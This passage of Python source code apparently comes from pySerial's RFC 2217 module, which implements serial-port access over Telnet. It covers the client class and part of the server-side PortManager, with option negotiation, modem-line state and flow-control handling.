SET_CONTROL_USE_NO_FLOW_CONTROL = to_bytes([1]) # Use No Flow Control (outbound/both)
SET_CONTROL_USE_SW_FLOW_CONTROL = to_bytes([2]) # Use XON/XOFF Flow Control (outbound/both)
SET_CONTROL_USE_HW_FLOW_CONTROL = to_bytes([3]) # Use HARDWARE Flow Control (outbound/both)
SET_CONTROL_REQ_BREAK_STATE = to_bytes([4]) # Request BREAK State
SET_CONTROL_BREAK_ON = to_bytes([5]) # Set BREAK State ON
SET_CONTROL_BREAK_OFF = to_bytes([6]) # Set BREAK State OFF
SET_CONTROL_REQ_DTR = to_bytes([7]) # Request DTR Signal State
SET_CONTROL_DTR_ON = to_bytes([8]) # Set DTR Signal State ON
SET_CONTROL_DTR_OFF = to_bytes([9]) # Set DTR Signal State OFF
SET_CONTROL_REQ_RTS = to_bytes([10]) # Request RTS Signal State
SET_CONTROL_RTS_ON = to_bytes([11]) # Set RTS Signal State ON
SET_CONTROL_RTS_OFF = to_bytes([12]) # Set RTS Signal State OFF
SET_CONTROL_REQ_FLOW_SETTING_IN = to_bytes([13]) # Request Com Port Flow Control Setting (inbound)
SET_CONTROL_USE_NO_FLOW_CONTROL_IN = to_bytes([14]) # Use No Flow Control (inbound)
SET_CONTROL_USE_SW_FLOW_CONTOL_IN = to_bytes([15]) # Use XON/XOFF Flow Control (inbound)
SET_CONTROL_USE_HW_FLOW_CONTOL_IN = to_bytes([16]) # Use HARDWARE Flow Control (inbound)
SET_CONTROL_USE_DCD_FLOW_CONTROL = to_bytes([17]) # Use DCD Flow Control (outbound/both)
SET_CONTROL_USE_DTR_FLOW_CONTROL = to_bytes([18]) # Use DTR Flow Control (inbound)
SET_CONTROL_USE_DSR_FLOW_CONTROL = to_bytes([19]) # Use DSR Flow Control (outbound/both)
LINESTATE_MASK_TIMEOUT = 128 # Time-out Error
LINESTATE_MASK_SHIFTREG_EMPTY = 64 # Transfer Shift Register Empty
LINESTATE_MASK_TRANSREG_EMPTY = 32 # Transfer Holding Register Empty
LINESTATE_MASK_BREAK_DETECT = 16 # Break-detect Error
LINESTATE_MASK_FRAMING_ERROR = 8 # Framing Error
LINESTATE_MASK_PARTIY_ERROR = 4 # Parity Error
LINESTATE_MASK_OVERRUN_ERROR = 2 # Overrun Error
LINESTATE_MASK_DATA_READY = 1 # Data Ready
MODEMSTATE_MASK_CD = 128 # Receive Line Signal Detect (also known as Carrier Detect)
MODEMSTATE_MASK_RI = 64 # Ring Indicator
MODEMSTATE_MASK_DSR = 32 # Data-Set-Ready Signal State
MODEMSTATE_MASK_CTS = 16 # Clear-To-Send Signal State
MODEMSTATE_MASK_CD_CHANGE = 8 # Delta Receive Line Signal Detect
MODEMSTATE_MASK_RI_CHANGE = 4 # Trailing-edge Ring Detector
MODEMSTATE_MASK_DSR_CHANGE = 2 # Delta Data-Set-Ready
MODEMSTATE_MASK_CTS_CHANGE = 1 # Delta Clear-To-Send
PURGE_RECEIVE_BUFFER = to_bytes([1]) # Purge access server receive data buffer
PURGE_TRANSMIT_BUFFER = to_bytes([2]) # Purge access server transmit data buffer
PURGE_BOTH_BUFFERS = to_bytes([3]) # Purge both the access server receive data buffer and the access server transmit data buffer
RFC2217_PARITY_MAP = {
PARITY_NONE: 1,
PARITY_ODD: 2,
PARITY_EVEN: 3,
PARITY_MARK: 4,
PARITY_SPACE: 5,
}
RFC2217_REVERSE_PARITY_MAP = dict((v,k) for k,v in list(RFC2217_PARITY_MAP.items()))
RFC2217_STOPBIT_MAP = {
STOPBITS_ONE: 1,
STOPBITS_ONE_POINT_FIVE: 3,
STOPBITS_TWO: 2,
}
RFC2217_REVERSE_STOPBIT_MAP = dict((v,k) for k,v in list(RFC2217_STOPBIT_MAP.items()))
# Telnet filter states
M_NORMAL = 0
M_IAC_SEEN = 1
M_NEGOTIATE = 2
# TelnetOption and TelnetSubnegotiation states
REQUESTED = 'REQUESTED'
ACTIVE = 'ACTIVE'
INACTIVE = 'INACTIVE'
REALLY_INACTIVE = 'REALLY_INACTIVE'
class TelnetOption(object):
"""Manage a single telnet option, keeps track of DO/DONT WILL/WONT."""
def __init__(self, connection, name, option, send_yes, send_no, ack_yes, ack_no, initial_state, activation_callback=None):
"""\
Initialize option.
:param connection: connection used to transmit answers
:param name: a readable name for debug outputs
:param send_yes: what to send when option is to be enabled.
:param send_no: what to send when option is to be disabled.
:param ack_yes: what to expect when remote agrees on option.
:param ack_no: what to expect when remote disagrees on option.
:param initial_state: options initialized with REQUESTED are tried to
be enabled on startup. use INACTIVE for all others.
"""
self.connection = connection
self.name = name
self.option = option
self.send_yes = send_yes
self.send_no = send_no
self.ack_yes = ack_yes
self.ack_no = ack_no
self.state = initial_state
self.active = False
self.activation_callback = activation_callback
def __repr__(self):
"""String for debug outputs"""
return "%s:%s(%s)" % (self.name, self.active, self.state)
def process_incoming(self, command):
"""\
A DO/DONT/WILL/WONT was received for this option, update state and
answer when needed.
"""
if command == self.ack_yes:
if self.state is REQUESTED:
self.state = ACTIVE
self.active = True
if self.activation_callback is not None:
self.activation_callback()
elif self.state is ACTIVE:
pass
elif self.state is INACTIVE:
self.state = ACTIVE
self.connection.telnetSendOption(self.send_yes, self.option)
self.active = True
if self.activation_callback is not None:
self.activation_callback()
elif self.state is REALLY_INACTIVE:
self.connection.telnetSendOption(self.send_no, self.option)
else:
raise ValueError('option in illegal state %r' % self)
elif command == self.ack_no:
if self.state is REQUESTED:
self.state = INACTIVE
self.active = False
elif self.state is ACTIVE:
self.state = INACTIVE
self.connection.telnetSendOption(self.send_no, self.option)
self.active = False
elif self.state is INACTIVE:
pass
elif self.state is REALLY_INACTIVE:
pass
else:
raise ValueError('option in illegal state %r' % self)
class TelnetSubnegotiation(object):
"""\
A object to handle subnegotiation of options. In this case actually
sub-sub options for RFC 2217. It is used to track com port options.
"""
def __init__(self, connection, name, option, ack_option=None):
if ack_option is None: ack_option = option
self.connection = connection
self.name = name
self.option = option
self.value = None
self.ack_option = ack_option
self.state = INACTIVE
def __repr__(self):
"""String for debug outputs."""
return "%s:%s" % (self.name, self.state)
def set(self, value):
"""\
Request a change of the value. a request is sent to the server. if
the client needs to know if the change is performed he has to check the
state of this object.
"""
self.value = value
self.state = REQUESTED
self.connection.rfc2217SendSubnegotiation(self.option, self.value)
if self.connection.logger:
self.connection.logger.debug("SB Requesting %s -> %r" % (self.name, self.value))
def isReady(self):
"""\
Check if answer from server has been received. when server rejects
the change, raise a ValueError.
"""
if self.state == REALLY_INACTIVE:
raise ValueError("remote rejected value for option %r" % (self.name))
return self.state == ACTIVE
# add property to have a similar interface as TelnetOption
active = property(isReady)
def wait(self, timeout=3):
"""\
Wait until the subnegotiation has been acknowledged or timeout. It
can also throw a value error when the answer from the server does not
match the value sent.
"""
timeout_time = time.time() + timeout
while time.time() < timeout_time:
time.sleep(0.05) # prevent 100% CPU load
if self.isReady():
break
else:
raise SerialException("timeout while waiting for option %r" % (self.name))
def checkAnswer(self, suboption):
"""\
Check an incoming subnegotiation block. The parameter already has
cut off the header like sub option number and com port option value.
"""
if self.value == suboption[:len(self.value)]:
self.state = ACTIVE
else:
# error propagation done in isReady
self.state = REALLY_INACTIVE
if self.connection.logger:
self.connection.logger.debug("SB Answer %s -> %r -> %s" % (self.name, suboption, self.state))
class RFC2217Serial(SerialBase):
"""Serial port implementation for RFC 2217 remote serial ports."""
BAUDRATES = (50, 75, 110, 134, 150, 200, 300, 600, 1200, 1800, 2400, 4800,
9600, 19200, 38400, 57600, 115200)
def open(self):
"""\
Open port with current settings. This may throw a SerialException
if the port cannot be opened.
"""
self.logger = None
self._ignore_set_control_answer = False
self._poll_modem_state = False
self._network_timeout = 3
if self._port is None:
raise SerialException("Port must be configured before it can be used.")
if self._isOpen:
raise SerialException("Port is already open.")
try:
self._socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self._socket.connect(self.fromURL(self.portstr))
self._socket.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
except Exception as msg:
self._socket = None
raise SerialException("Could not open port %s: %s" % (self.portstr, msg))
self._socket.settimeout(5) # XXX good value?
# use a thread save queue as buffer. it also simplifies implementing
# the read timeout
self._read_buffer = queue.Queue()
# to ensure that user writes does not interfere with internal
# telnet/rfc2217 options establish a lock
self._write_lock = threading.Lock()
# name the following separately so that, below, a check can be easily done
mandadory_options = [
TelnetOption(self, 'we-BINARY', BINARY, WILL, WONT, DO, DONT, INACTIVE),
TelnetOption(self, 'we-RFC2217', COM_PORT_OPTION, WILL, WONT, DO, DONT, REQUESTED),
]
# all supported telnet options
self._telnet_options = [
TelnetOption(self, 'ECHO', ECHO, DO, DONT, WILL, WONT, REQUESTED),
TelnetOption(self, 'we-SGA', SGA, WILL, WONT, DO, DONT, REQUESTED),
TelnetOption(self, 'they-SGA', SGA, DO, DONT, WILL, WONT, REQUESTED),
TelnetOption(self, 'they-BINARY', BINARY, DO, DONT, WILL, WONT, INACTIVE),
TelnetOption(self, 'they-RFC2217', COM_PORT_OPTION, DO, DONT, WILL, WONT, REQUESTED),
] + mandadory_options
# RFC 2217 specific states
# COM port settings
self._rfc2217_port_settings = {
'baudrate': TelnetSubnegotiation(self, 'baudrate', SET_BAUDRATE, SERVER_SET_BAUDRATE),
'datasize': TelnetSubnegotiation(self, 'datasize', SET_DATASIZE, SERVER_SET_DATASIZE),
'parity': TelnetSubnegotiation(self, 'parity', SET_PARITY, SERVER_SET_PARITY),
'stopsize': TelnetSubnegotiation(self, 'stopsize', SET_STOPSIZE, SERVER_SET_STOPSIZE),
}
# There are more subnegotiation objects, combine all in one dictionary
# for easy access
self._rfc2217_options = {
'purge': TelnetSubnegotiation(self, 'purge', PURGE_DATA, SERVER_PURGE_DATA),
'control': TelnetSubnegotiation(self, 'control', SET_CONTROL, SERVER_SET_CONTROL),
}
self._rfc2217_options.update(self._rfc2217_port_settings)
# cache for line and modem states that the server sends to us
self._linestate = 0
self._modemstate = None
self._modemstate_expires = 0
# RFC 2217 flow control between server and client
self._remote_suspend_flow = False
self._thread = threading.Thread(target=self._telnetReadLoop)
self._thread.setDaemon(True)
self._thread.setName('pySerial RFC 2217 reader thread for %s' % (self._port,))
self._thread.start()
# negotiate Telnet/RFC 2217 -> send initial requests
for option in self._telnet_options:
if option.state is REQUESTED:
self.telnetSendOption(option.send_yes, option.option)
# now wait until important options are negotiated
timeout_time = time.time() + self._network_timeout
while time.time() < timeout_time:
time.sleep(0.05) # prevent 100% CPU load
if sum(o.active for o in mandadory_options) == sum(o.state != INACTIVE for o in mandadory_options):
break
else:
raise SerialException("Remote does not seem to support RFC2217 or BINARY mode %r" % mandadory_options)
if self.logger:
self.logger.info("Negotiated options: %s" % self._telnet_options)
# fine, go on, set RFC 2271 specific things
self._reconfigurePort()
# all things set up get, now a clean start
self._isOpen = True
if not self._rtscts:
self.setRTS(True)
self.setDTR(True)
self.flushInput()
self.flushOutput()
def _reconfigurePort(self):
"""Set communication parameters on opened port."""
if self._socket is None:
raise SerialException("Can only operate on open ports")
# if self._timeout != 0 and self._interCharTimeout is not None:
# XXX
if self._writeTimeout is not None:
raise NotImplementedError('writeTimeout is currently not supported')
# XXX
# Setup the connection
# to get good performance, all parameter changes are sent first...
if not isinstance(self._baudrate, int) or not 0 < self._baudrate < 2**32:
raise ValueError("invalid baudrate: %r" % (self._baudrate))
self._rfc2217_port_settings['baudrate'].set(struct.pack('!I', self._baudrate))
self._rfc2217_port_settings['datasize'].set(struct.pack('!B', self._bytesize))
self._rfc2217_port_settings['parity'].set(struct.pack('!B', RFC2217_PARITY_MAP[self._parity]))
self._rfc2217_port_settings['stopsize'].set(struct.pack('!B', RFC2217_STOPBIT_MAP[self._stopbits]))
# and now wait until parameters are active
items = list(self._rfc2217_port_settings.values())
if self.logger:
self.logger.debug("Negotiating settings: %s" % (items,))
timeout_time = time.time() + self._network_timeout
while time.time() < timeout_time:
time.sleep(0.05) # prevent 100% CPU load
if sum(o.active for o in items) == len(items):
break
else:
raise SerialException("Remote does not accept parameter change (RFC2217): %r" % items)
if self.logger:
self.logger.info("Negotiated settings: %s" % (items,))
if self._rtscts and self._xonxoff:
raise ValueError('xonxoff and rtscts together are not supported')
elif self._rtscts:
self.rfc2217SetControl(SET_CONTROL_USE_HW_FLOW_CONTROL)
elif self._xonxoff:
self.rfc2217SetControl(SET_CONTROL_USE_SW_FLOW_CONTROL)
else:
self.rfc2217SetControl(SET_CONTROL_USE_NO_FLOW_CONTROL)
def close(self):
"""Close port"""
if self._isOpen:
if self._socket:
try:
self._socket.shutdown(socket.SHUT_RDWR)
self._socket.close()
except:
# ignore errors.
pass
self._socket = None
if self._thread:
self._thread.join()
self._isOpen = False
# in case of quick reconnects, give the server some time
time.sleep(0.3)
def makeDeviceName(self, port):
raise SerialException("there is no sensible way to turn numbers into URLs")
def fromURL(self, url):
"""extract host and port from an URL string"""
if url.lower().startswith("rfc2217://"): url = url[10:]
try:
# is there a "path" (our options)?
if '/' in url:
# cut away options
url, options = url.split('/', 1)
# process options now, directly altering self
for option in options.split('/'):
if '=' in option:
option, value = option.split('=', 1)
else:
value = None
if option == 'logging':
logging.basicConfig() # XXX is that good to call it here?
self.logger = logging.getLogger('pySerial.rfc2217')
self.logger.setLevel(LOGGER_LEVELS[value])
self.logger.debug('enabled logging')
elif option == 'ign_set_control':
self._ignore_set_control_answer = True
elif option == 'poll_modem':
self._poll_modem_state = True
elif option == 'timeout':
self._network_timeout = float(value)
else:
raise ValueError('unknown option: %r' % (option,))
# get host and port
host, port = url.split(':', 1) # may raise ValueError because of unpacking
port = int(port) # and this if it's not a number
if not 0 <= port < 65536: raise ValueError("port not in range 0...65535")
except ValueError as e:
raise SerialException('expected a string in the form "[rfc2217://]<host>:<port>[/option[/option...]]": %s' % e)
return (host, port)
# - - - - - - - - - - - - - - - - - - - - - - - -
def inWaiting(self):
"""Return the number of characters currently in the input buffer."""
if not self._isOpen: raise portNotOpenError
return self._read_buffer.qsize()
def read(self, size=1):
"""\
Read size bytes from the serial port. If a timeout is set it may
return less characters as requested. With no timeout it will block
until the requested number of bytes is read.
"""
if not self._isOpen: raise portNotOpenError
data = bytearray()
try:
while len(data) < size:
if self._thread is None:
raise SerialException('connection failed (reader thread died)')
data.append(self._read_buffer.get(True, self._timeout))
except queue.Empty: # -> timeout
pass
return bytes(data)
def write(self, data):
"""\
Output the given string over the serial port. Can block if the
connection is blocked. May raise SerialException if the connection is
closed.
"""
if not self._isOpen: raise portNotOpenError
self._write_lock.acquire()
try:
try:
self._socket.sendall(to_bytes(data).replace(IAC, IAC_DOUBLED))
except socket.error as e:
raise SerialException("connection failed (socket error): %s" % e) # XXX what exception if socket connection fails
finally:
self._write_lock.release()
return len(data)
def flushInput(self):
"""Clear input buffer, discarding all that is in the buffer."""
if not self._isOpen: raise portNotOpenError
self.rfc2217SendPurge(PURGE_RECEIVE_BUFFER)
# empty read buffer
while self._read_buffer.qsize():
self._read_buffer.get(False)
def flushOutput(self):
"""\
Clear output buffer, aborting the current output and
discarding all that is in the buffer.
"""
if not self._isOpen: raise portNotOpenError
self.rfc2217SendPurge(PURGE_TRANSMIT_BUFFER)
def sendBreak(self, duration=0.25):
"""\
Send break condition. Timed, returns to idle state after given
duration.
"""
if not self._isOpen: raise portNotOpenError
self.setBreak(True)
time.sleep(duration)
self.setBreak(False)
def setBreak(self, level=True):
"""\
Set break: Controls TXD. When active, to transmitting is
possible.
"""
if not self._isOpen: raise portNotOpenError
if self.logger:
self.logger.info('set BREAK to %s' % ('inactive', 'active')[bool(level)])
if level:
self.rfc2217SetControl(SET_CONTROL_BREAK_ON)
else:
self.rfc2217SetControl(SET_CONTROL_BREAK_OFF)
def setRTS(self, level=True):
"""Set terminal status line: Request To Send."""
if not self._isOpen: raise portNotOpenError
if self.logger:
self.logger.info('set RTS to %s' % ('inactive', 'active')[bool(level)])
if level:
self.rfc2217SetControl(SET_CONTROL_RTS_ON)
else:
self.rfc2217SetControl(SET_CONTROL_RTS_OFF)
def setDTR(self, level=True):
"""Set terminal status line: Data Terminal Ready."""
if not self._isOpen: raise portNotOpenError
if self.logger:
self.logger.info('set DTR to %s' % ('inactive', 'active')[bool(level)])
if level:
self.rfc2217SetControl(SET_CONTROL_DTR_ON)
else:
self.rfc2217SetControl(SET_CONTROL_DTR_OFF)
def getCTS(self):
"""Read terminal status line: Clear To Send."""
if not self._isOpen: raise portNotOpenError
return bool(self.getModemState() & MODEMSTATE_MASK_CTS)
def getDSR(self):
"""Read terminal status line: Data Set Ready."""
if not self._isOpen: raise portNotOpenError
return bool(self.getModemState() & MODEMSTATE_MASK_DSR)
def getRI(self):
"""Read terminal status line: Ring Indicator."""
if not self._isOpen: raise portNotOpenError
return bool(self.getModemState() & MODEMSTATE_MASK_RI)
def getCD(self):
"""Read terminal status line: Carrier Detect."""
if not self._isOpen: raise portNotOpenError
return bool(self.getModemState() & MODEMSTATE_MASK_CD)
# - - - platform specific - - -
# None so far
# - - - RFC2217 specific - - -
def _telnetReadLoop(self):
"""Read loop for the socket."""
mode = M_NORMAL
suboption = None
try:
while self._socket is not None:
try:
data = self._socket.recv(1024)
except socket.timeout:
# just need to get out of recv form time to time to check if
# still alive
continue
except socket.error as e:
# connection fails -> terminate loop
if self.logger:
self.logger.debug("socket error in reader thread: %s" % (e,))
break
if not data: break # lost connection
for byte in data:
if mode == M_NORMAL:
# interpret as command or as data
if byte == IAC:
mode = M_IAC_SEEN
else:
# store data in read buffer or sub option buffer
# depending on state
if suboption is not None:
suboption.append(byte)
else:
self._read_buffer.put(byte)
elif mode == M_IAC_SEEN:
if byte == IAC:
# interpret as command doubled -> insert character
# itself
if suboption is not None:
suboption.append(IAC)
else:
self._read_buffer.put(IAC)
mode = M_NORMAL
elif byte == SB:
# sub option start
suboption = bytearray()
mode = M_NORMAL
elif byte == SE:
# sub option end -> process it now
self._telnetProcessSubnegotiation(bytes(suboption))
suboption = None
mode = M_NORMAL
elif byte in (DO, DONT, WILL, WONT):
# negotiation
telnet_command = byte
mode = M_NEGOTIATE
else:
# other telnet commands
self._telnetProcessCommand(byte)
mode = M_NORMAL
elif mode == M_NEGOTIATE: # DO, DONT, WILL, WONT was received, option now following
self._telnetNegotiateOption(telnet_command, byte)
mode = M_NORMAL
finally:
self._thread = None
if self.logger:
self.logger.debug("read thread terminated")
# - incoming telnet commands and options
def _telnetProcessCommand(self, command):
"""Process commands other than DO, DONT, WILL, WONT."""
# Currently none. RFC2217 only uses negotiation and subnegotiation.
if self.logger:
self.logger.warning("ignoring Telnet command: %r" % (command,))
def _telnetNegotiateOption(self, command, option):
"""Process incoming DO, DONT, WILL, WONT."""
# check our registered telnet options and forward command to them
# they know themselves if they have to answer or not
known = False
for item in self._telnet_options:
# can have more than one match! as some options are duplicated for
# 'us' and 'them'
if item.option == option:
item.process_incoming(command)
known = True
if not known:
# handle unknown options
# only answer to positive requests and deny them
if command == WILL or command == DO:
self.telnetSendOption((command == WILL and DONT or WONT), option)
if self.logger:
self.logger.warning("rejected Telnet option: %r" % (option,))
def _telnetProcessSubnegotiation(self, suboption):
"""Process subnegotiation, the data between IAC SB and IAC SE."""
if suboption[0:1] == COM_PORT_OPTION:
if suboption[1:2] == SERVER_NOTIFY_LINESTATE and len(suboption) >= 3:
self._linestate = ord(suboption[2:3]) # ensure it is a number
if self.logger:
self.logger.info("NOTIFY_LINESTATE: %s" % self._linestate)
elif suboption[1:2] == SERVER_NOTIFY_MODEMSTATE and len(suboption) >= 3:
self._modemstate = ord(suboption[2:3]) # ensure it is a number
if self.logger:
self.logger.info("NOTIFY_MODEMSTATE: %s" % self._modemstate)
# update time when we think that a poll would make sense
self._modemstate_expires = time.time() + 0.3
elif suboption[1:2] == FLOWCONTROL_SUSPEND:
self._remote_suspend_flow = True
elif suboption[1:2] == FLOWCONTROL_RESUME:
self._remote_suspend_flow = False
else:
for item in list(self._rfc2217_options.values()):
if item.ack_option == suboption[1:2]:
#~ print "processing COM_PORT_OPTION: %r" % list(suboption[1:])
item.checkAnswer(bytes(suboption[2:]))
break
else:
if self.logger:
self.logger.warning("ignoring COM_PORT_OPTION: %r" % (suboption,))
else:
if self.logger:
self.logger.warning("ignoring subnegotiation: %r" % (suboption,))
# - outgoing telnet commands and options
def _internal_raw_write(self, data):
"""internal socket write with no data escaping. used to send telnet stuff."""
self._write_lock.acquire()
try:
self._socket.sendall(data)
finally:
self._write_lock.release()
def telnetSendOption(self, action, option):
"""Send DO, DONT, WILL, WONT."""
self._internal_raw_write(to_bytes([IAC, action, option]))
def rfc2217SendSubnegotiation(self, option, value=''):
"""Subnegotiation of RFC2217 parameters."""
value = value.replace(IAC, IAC_DOUBLED)
self._internal_raw_write(to_bytes([IAC, SB, COM_PORT_OPTION, option] + list(value) + [IAC, SE]))
def rfc2217SendPurge(self, value):
item = self._rfc2217_options['purge']
item.set(value) # transmit desired purge type
item.wait(self._network_timeout) # wait for acknowledge from the server
def rfc2217SetControl(self, value):
item = self._rfc2217_options['control']
item.set(value) # transmit desired control type
if self._ignore_set_control_answer:
# answers are ignored when option is set. compatibility mode for
# servers that answer, but not the expected one... (or no answer
# at all) i.e. sredird
time.sleep(0.1) # this helps getting the unit tests passed
else:
item.wait(self._network_timeout) # wait for acknowledge from the server
def rfc2217FlowServerReady(self):
"""\
check if server is ready to receive data. block for some time when
not.
"""
#~ if self._remote_suspend_flow:
#~ wait---
def getModemState(self):
"""\
get last modem state (cached value. If value is "old", request a new
one. This cache helps that we don't issue to many requests when e.g. all
status lines, one after the other is queried by the user (getCTS, getDSR
etc.)
"""
# active modem state polling enabled? is the value fresh enough?
if self._poll_modem_state and self._modemstate_expires < time.time():
if self.logger:
self.logger.debug('polling modem state')
# when it is older, request an update
self.rfc2217SendSubnegotiation(NOTIFY_MODEMSTATE)
timeout_time = time.time() + self._network_timeout
while time.time() < timeout_time:
time.sleep(0.05) # prevent 100% CPU load
# when expiration time is updated, it means that there is a new
# value
if self._modemstate_expires > time.time():
if self.logger:
self.logger.warning('poll for modem state failed')
break
# even when there is a timeout, do not generate an error just
# return the last known value. this way we can support buggy
# servers that do not respond to polls, but send automatic
# updates.
if self._modemstate is not None:
if self.logger:
self.logger.debug('using cached modem state')
return self._modemstate
else:
# never received a notification from the server
raise SerialException("remote sends no NOTIFY_MODEMSTATE")
# assemble Serial class with the platform specific implementation and the base
# for file-like behavior. for Python 2.6 and newer, that provide the new I/O
# library, derive from io.RawIOBase
try:
import io
except ImportError:
# classic version with our own file-like emulation
class Serial(RFC2217Serial, FileLike):
pass
else:
# io library present
class Serial(RFC2217Serial, io.RawIOBase):
pass
#############################################################################
# The following is code that helps implementing an RFC 2217 server.
class PortManager(object):
"""\
This class manages the state of Telnet and RFC 2217. It needs a serial
instance and a connection to work with. Connection is expected to implement
a (thread safe) write function, that writes the string to the network.
"""
def __init__(self, serial_port, connection, logger=None):
self.serial = serial_port
self.connection = connection
self.logger = logger
self._client_is_rfc2217 = False
# filter state machine
self.mode = M_NORMAL
self.suboption = None
self.telnet_command = None
# states for modem/line control events
self.modemstate_mask = 255
self.last_modemstate = None
self.linstate_mask = 0
# all supported telnet options
self._telnet_options = [
TelnetOption(self, 'ECHO', ECHO, WILL, WONT, DO, DONT, REQUESTED),
TelnetOption(self, 'we-SGA', SGA, WILL, WONT, DO, DONT, REQUESTED),
TelnetOption(self, 'they-SGA', SGA, DO, DONT, WILL, WONT, INACTIVE),
TelnetOption(self, 'we-BINARY', BINARY, WILL, WONT, DO, DONT, INACTIVE),
TelnetOption(self, 'they-BINARY', BINARY, DO, DONT, WILL, WONT, REQUESTED),
TelnetOption(self, 'we-RFC2217', COM_PORT_OPTION, WILL, WONT, DO, DONT, REQUESTED, self._client_ok),
TelnetOption(self, 'they-RFC2217', COM_PORT_OPTION, DO, DONT, WILL, WONT, INACTIVE, self._client_ok),
]
# negotiate Telnet/RFC2217 -> send initial requests
if self.logger:
self.logger.debug("requesting initial Telnet/RFC 2217 options")
for option in self._telnet_options:
if option.state is REQUESTED:
self.telnetSendOption(option.send_yes, option.option)
# issue 1st modem state notification
def _client_ok(self):
"""\
callback of telnet option. It gets called when option is activated.
This one here is used to detect when the client agrees on RFC 2217. A
flag is set so that other functions like check_modem_lines know if the
client is OK.
"""
# The callback is used for we and they so if one party agrees, we're
# already happy. it seems not all servers do the negotiation correctly
# and i guess there are incorrect clients too.. so be happy if client
# answers one or the other positively.
self._client_is_rfc2217 = True
if self.logger:
self.logger.info("client accepts RFC 2217")
# this is to ensure that the client gets a notification, even if there
# was no change
self.check_modem_lines(force_notification=True)
# - outgoing telnet commands and options
def telnetSendOption(self, action, option):
"""Send DO, DONT, WILL, WONT."""
self.connection.write(to_bytes([IAC, action, option]))
def rfc2217SendSubnegotiation(self, option, value=''):
"""Subnegotiation of RFC 2217 parameters."""
value = value.replace(IAC, IAC_DOUBLED)
self.connection.write(to_bytes([IAC, SB, COM_PORT_OPTION, option] + list(value) + [IAC, SE]))
# - check modem lines, needs to be called periodically from user to
# establish polling
def check_modem_lines(self, force_notification=False):
modemstate = (
(self.serial.getCTS() and MODEMSTATE_MASK_CTS) |
(self.serial.getDSR() and MODEMSTATE_MASK_DSR) |
(self.serial.getRI() and MODEMSTATE_MASK_RI) |
(self.serial.getCD() and MODEMSTATE_MASK_CD)
)
# check what has changed
deltas = modemstate ^ (self.last_modemstate or 0) # when last is None -> 0
if deltas & MODEMSTATE_MASK_CTS:
modemstate |= MODEMSTATE_MASK_CTS_CHANGE
if deltas & MODEMSTATE_MASK_DSR:
modemstate |= MODEMSTATE_MASK_DSR_CHANGE
if deltas & MODEMSTATE_MASK_RI:
modemstate |= MODEMSTATE_MASK_RI_CHANGE
if deltas & MODEMSTATE_MASK_CD:
modemstate |= MODEMSTATE_MASK_CD_CHANGE
# if new state is different and the mask allows this change, send
# notification. suppress notifications when client is not rfc2217
if modemstate != self.last_modemstate or force_notification:
if (self._client_is_rfc2217 and (modemstate & self.modemstate_mask)) or force_notification:
self.rfc2217SendSubnegotiation(
SERVER_NOTIFY_MODEMSTATE,
to_bytes([modemstate & self.modemstate_mask])
)
if self.logger:
self.logger.info("NOTIFY_MODEMSTATE: %s" % (modemstate,))
# save last state, but forget about deltas.
# otherwise it would also notify about changing deltas which is
# probably not very useful
self.last_modemstate = modemstate & 0xf0
# - outgoing data escaping
def escape(self, data):
"""\
This generator function is for the user. All outgoing data has to be
properly escaped, so that no IAC character in the data stream messes up
the Telnet state machine in the server.
socket.sendall(escape(data))
"""
for byte in data:
if byte == IAC:
yield IAC
yield IAC
else:
yield byte
# - incoming data filter
def filter(self, data):
"""\
Handle a bunch of incoming bytes. This is a generator. It will yield
all characters not of interest for Telnet/RFC 2217.
The idea is that the reader thread pushes data from the socket through
this filter:
for byte in filter(socket.recv(1024)):
# do things like CR/LF conversion/whatever
# and write data to the serial port
serial.write(byte)
(socket error handling code left as exercise for the reader)
"""
for byte in data:
if self.mode == M_NORMAL:
# interpret as command or as data
if byte == IAC:
self.mode = M_IAC_SEEN
else:
# store data in sub option buffer or pass it to our
# consumer depending on state
if self.suboption is not None:
self.suboption.append(byte)
else:
yield byte
elif self.mode == M_IAC_SEEN:
if byte == IAC:
# interpret as command doubled -> insert character
# itself
if self.suboption is not None:
self.suboption.append(byte)
else:
yield byte
self.mode = M_NORMAL
elif byte == SB:
# sub option start
self.suboption = bytearray()
self.mode = M_NORMAL
elif byte == SE:
# sub option end -> process it now
self._telnetProcessSubnegotiation(bytes(self.suboption))
self.suboption = None
self.mode = M_NORMAL
elif byte in (DO, DONT, WILL, WONT):
# negotiation
self.telnet_command = byte
self.mode = M_NEGOTIATE
else:
# other telnet commands
self._telnetProcessCommand(byte)
self.mode = M_NORMAL
elif self.mode == M_NEGOTIATE: # DO, DONT, WILL, WONT was received, option now following
self._telnetNegotiateOption(self.telnet_command, byte)
self.mode = M_NORMAL
# - incoming telnet commands and options
def _telnetProcessCommand(self, command):
"""Process commands other than DO, DONT, WILL, WONT."""
# Currently none. RFC2217 only uses negotiation and subnegotiation.
if self.logger:
self.logger.warning("ignoring Telnet command: %r" % (command,))
def _telnetNegotiateOption(self, command, option):
"""Process incoming DO, DONT, WILL, WONT."""
# check our registered telnet options and forward command to them
# they know themselves if they have to answer or not
known = False
for item in self._telnet_options:
# can have more than one match! as some options are duplicated for
# 'us' and 'them'
if item.option == option:
item.process_incoming(command)
known = True
if not known:
# handle unknown options
# only answer to positive requests and deny them
if command == WILL or command == DO:
self.telnetSendOption((command == WILL and DONT or WONT), option)
if self.logger:
self.logger.warning("rejected Telnet option: %r" % (option,))
def _telnetProcessSubnegotiation(self, suboption):
"""Process subnegotiation, the data between IAC SB and IAC SE."""
if suboption[0:1] == COM_PORT_OPTION:
if self.logger:
self.logger.debug('received COM_PORT_OPTION: %r' % (suboption,))
if suboption[1:2] == SET_BAUDRATE:
backup = self.serial.baudrate
try:
(baudrate,) = struct.unpack("!I", suboption[2:6])
if baudrate != 0:
self.serial.baudrate = baudrate
except ValueError as e:
if self.logger:
self.logger.error("failed to set baud rate: %s" % (e,))
self.serial.baudrate = backup
else:
if self.logger:
self.logger.info("%s baud rate: %s" % (baudrate and 'set' or 'get', self.serial.baudrate))
self.rfc2217SendSubnegotiation(SERVER_SET_BAUDRATE, struct.pack("!I", self.serial.baudrate))
elif suboption[1:2] == SET_DATASIZE:
backup = self.serial.bytesize
try:
(datasize,) = struct.unpack("!B", suboption[2:3])
if datasize != 0:
self.serial.bytesize = datasize
except ValueError as e:
if self.logger:
self.logger.error("failed to set data size: %s" % (e,))
self.serial.bytesize = backup
else:
if self.logger:
self.logger.info("%s data size: %s" % (datasize and 'set' or 'get', self.serial.bytesize))
